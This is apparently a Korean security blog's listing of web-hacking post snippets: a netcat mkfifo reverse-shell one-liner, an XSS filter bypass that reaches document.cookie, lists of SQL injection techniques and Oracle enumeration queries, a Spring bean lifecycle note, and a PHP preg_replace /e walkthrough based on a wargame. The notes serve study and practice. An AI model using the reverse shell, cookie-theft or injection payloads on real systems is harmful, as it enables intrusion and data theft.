목록Web (6)
kaka09
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [IP ADDRESS] [PORT] >/tmp/f
http://blog.infobytesec.com/2012/09/bypassing-wafs-with-non-alphanumeric-xss.html document['cookie'] document['\x63\x6f\x6f\x6b\x69\x65'] 등등
걍 생각나는거 10가지.. 1-0 boolean 기법1-1 일반 문자열(쿼터)1-2 char()기법1-3 hex값 기법1-4 binary 기법1-5 cast 기법1-6 if 기법1-7 case when 기법1-8 coleasce기법1-9 비트연산 기법1-10 @a 변수 기법 ----boolean 기법-----select id from login where id=''
SELECT version FROM v$instance;select banner from v$version where rownum=1#버전명 출력 SELECT USER FROM DUAL;#현재 DB를 사용하는 사용자명 출력 SELECT SYS.DATABASE_NAME FROM DUAL;orSELECT INSTANCE_NAME FROM v$instance;#현재 사용중인 DB의 SID명 출력 SELECT * FROM USER_SYS_PRIVS;SELECT * FROM session_privsSELECT * FROM dba_role_privsSELECT * FROM dba_sys_privsSELECT * FROM user_tab_privs#사용자에게 주어진 권한 확인 SELECT * FROM ALL_TABL..
사용법 ..... implements InitializingBean, DisposableBean{...} InitializingBean= 빈 초기화 과정에 호출( ctx.refresh() 과정에서 호출됨) @Overridepublic void afterPropertiesSet() thorws Exception {} DisposableBean= 빈 소멸과정에 호출( ctx.close() 과정에서 호출됨) @overridepublic void destroy() throws Exception{} 다른 사용법 @PostConstruct # 빈 초기화 과정에 호출 ( ctx.refresh() 과정에서 호출됨)public void initMethod(){} @PreDestroy # 빈 소멸과정에 호출 ( ctx.c..
PHP e ModiFier 취약점은 preg_replace 함수에서 "/e" 옵션을 사용할때 발생하는 취약점이다. "/e" 옵션은 치환될 문자를 php 코드 그대로 해석하는 옵션이다. 만약 치환된 결과가 system과 같은 문자열일 경우 /e 옵션에 의해 해당 문자열은 php 코드 그대로 해석하게 될 것이다. Nebula level09 문제를 통해서 e modifier 취약점에 대해 살펴보자 [사진]1-1 소스코드를 살펴보면 인자 2개를 받도록 설계되어 있고, 그중 첫번째 인자는 파일명을 받도록 되어있다. 여기서 취약점 포인트는 $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents); 부분이다.위에서 서술한대로 "/e"옵션을..